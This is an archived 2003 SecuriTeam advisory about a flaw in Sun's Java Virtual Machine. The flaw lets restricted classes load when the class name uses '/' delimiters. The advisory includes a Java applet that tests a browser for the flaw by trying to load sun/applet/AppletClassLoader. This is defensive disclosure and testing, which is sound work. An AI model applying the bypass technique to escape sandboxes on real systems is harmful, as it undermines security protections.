[EXPL] Security vulnerability in SUN's Java Virtual Machine Implementation (Test)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/28/03

  • Next message: SecuriTeam: "[EXPL] Buffer Overflow in Sun Solaris Runtime Linker (Exploit)" 
    To: list@securiteam.com
Date: 28 Oct 2003 15:51:30 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Security vulnerability in SUN's Java Virtual Machine Implementation (Test)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article
    <http://www.securiteam.com/securitynews/6A00P0U8KM.html> Security
    Vulnerability in SUN's Java Virtual Machine Implementation ('/' Replaces
    '.'), a vulnerability exists in the way Sun has implemented its JVM. The
    vulnerability allows loading restricted classes by issuing a request for a
    class using the '/' delimiter instead of the '.' delimiter. The following
    is a test that can be conducted on your browser to verify whether you are
    vulnerable to this vulnerability or not.

    DETAILS

    The following applet tests for this vulnerability:
    import java.applet.Applet;
    import java.awt.Graphics;
    import java.lang.Class;
    import java.security.AccessControlException;

    public class Simple extends Applet {

         StringBuffer buffer;

         public void init() {
             buffer = new StringBuffer();
         }

         public void start() {
             ClassLoader cl = this.getClass().getClassLoader();
             try {
                     Class cla = cl.loadClass("sun/applet/AppletClassLoader");
    // Note the slashes
                     addItem("No exception in loadClass. Vulnerable!");
             } catch (ClassNotFoundException e) {
                     addItem("ClassNotFoundException in loadClass - " + e);
             } catch (AccessControlException e) {
                     addItem("AccessControlException in loadClass - Not
    Vulnerable!");
             }

         }

         void addItem(String newWord) {
             System.out.println(newWord);
             buffer.append(newWord);
             repaint();
         }

         public void paint(Graphics g) {
             //Draw a Rectangle around the applet's display area.
             g.drawRect(0, 0, size().width - 1, size().height - 1);

             //Draw the current string inside the rectangle.
             g.drawString(buffer.toString(), 5, 15);
         }
    }

    This test can also be found here:
    <http://bcheck.scanit.be/bcheck/applet.html>
    http://bcheck.scanit.be/bcheck/applet.html.

    If Sun Java VM is installed, the applet will inform you whether you are
    vulnerable or not.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:alla@scanit.be> Alla
    Bezroutchko.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Buffer Overflow in Sun Solaris Runtime Linker (Exploit)"

    Relevant Pages